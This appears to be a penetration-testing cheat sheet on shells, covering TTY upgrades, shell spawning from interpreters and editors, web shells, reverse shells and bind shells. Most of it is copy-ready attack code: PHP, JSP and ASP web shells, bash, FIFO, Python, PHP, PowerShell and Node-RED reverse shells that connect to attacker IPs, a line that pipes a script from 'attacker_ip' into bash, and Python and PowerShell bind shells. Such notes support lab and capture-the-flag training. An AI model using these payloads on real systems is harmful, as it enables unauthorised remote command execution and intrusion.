Page cover
Edit

Shells/TTYs

and Shells

Teletypewriters

Get a Full TTY

BASH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

ZSH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg %1; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Clear Terminal

Change the env to xterm
export TERM=xterm

Check your terminal size
stty size
Now, change it in the target
stty rows <NUMBER> columns <NUMBER>

Use arrow-keys

Just use it
bash
Turn history on
set -o history

  • In the .bashrc file, make sure HISTSIZE is not set to 0:

HISTSIZE=1000
HISTFILESIZE=1000

rlwrap enables line editing and history:

Listener example
rlwrap nc -lvnp <port>
Connection example
rlwrap nc 10.10.10.131 6200
Spawning Shells

The pty module in Python allows you to spawn a new process in a pseudo-terminal, effectively creating an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/sh")'

The script command starts a shell session and records the session to a file. /dev/null is specified as the file where the session is "recorded", but since it's /dev/null, no logging actually happens:

script -qc /bin/bash /dev/null

Also is possible to use echo to pass Python os.system('/bin/bash') to the Python interpreter:

echo os.system('/bin/bash')

Spawn an interactive shell directly from the terminal:

/bin/sh -i

The command exec "/bin/sh" replaces the running Perl process with a new /bin/sh shell:

perl -e 'exec "/bin/sh";'
Spawn the shell directly
perl: exec "/bin/sh";

Ruby's exec function, like in Perl, replaces the current process with a new process—in this case, /bin/sh:

ruby: exec "/bin/sh"

Runs a shell command from Lua, but unlike in Perl or Ruby, this does not replace the current process. It runs /bin/sh as a child process:

lua: os.execute('/bin/sh')

Replaces the current Ruby interpreter (IRB) with the shell:

exec "/bin/sh";

Used to execute an external shell command:

:!bash

Changes the default shell used by vim's :! command:

:set shell=/bin/bash:shell

Spawn a shell from within the nmap interface, enabling the execution of additional shell commands while scanning:

!sh

PSY

PSY Shell is an interactive PHP REPL (Read-Eval-Print Loop) used normally for debugging.

Print the working directory
getcwd()
Print the current user
get_current_user()
Print system info
phpinfo()
Print contents from directory
scandir("/home")
Print content from file
file_get_contents("/etc/os-release")
Web Shells
PHP Shell
<?php system($_REQUEST['cmd']); ?>
Create a web shell file
echo '<?php system($_REQUEST['cmd']); ?>' > cmd.php
JSP - Java Server Pages
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
ASP - Active Server Pages
<% eval request("cmd") %>
BASH Reverse Shells
Standard
bash -i >& /dev/tcp/10.10.14.18/1337 0>&1
URL
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'

FIFO

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
URL Encoded
rm%20/tmp/f%3B%20mkfifo%20/tmp/f%3B%20cat%20/tmp/f%20%7C%20/bin/sh%20-i%202%3E%261%20%7C%20nc%2010.10.16.10%204444%20%3E%20/tmp/f
Run it in the background
nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &
Python Reverse Shells

PTY

One-liner IPv4
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Save in a file IPv4
echo 'import pty
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.6", 4444))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn("/bin/bash")
s.close()' > shell.py

subprocess

One-liner IPv4 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Save it in a file IPv4
echo 'import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.157", 1235))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
subprocess.call(["/bin/sh", "-i"])
s.close()' > shell.py
Can also use curl
curl http://SITE.com/shell.php --data-urlencode "cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
UDP Reverse shell
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &").read()
PHP Reverse shell
Direct reverse shell
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.17/4444 0>&1'");?>
Remote reverse shell
<?php system("curl http://attacker_ip/reverseshell | bash"); ?>
FIFO 
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <Port> >/tmp/f"); ?>
Powershell Reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Node-Red Reverse shell
Import it
[{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"10.10.14.126","port":"9999","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}]

  • Once you received the connection use another listener you get a more stable shell:

bash -c "bash -i > /dev/tcp/10.10.14.172/3000 0>&1" &

  • Then use script:

script -qc /bin/bash /dev/null
Bind Shells

  • First, find ports were inbound connections are allowed:

Linux
ss -tuln
netstat -tuln
lsof -i -n
netstat -ano | findstr "LISTEN"
Get-Process | Where-Object {$_.Id -eq (Get-NetTCPConnection | Where-Object {$_.State -eq 'Listen'}).OwningProcess}

Check the firewall rules in Windows:

netsh advfirewall firewall show rule name=all
Python Shell
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
PreviousMetadata RemovalNextWordlists

Last updated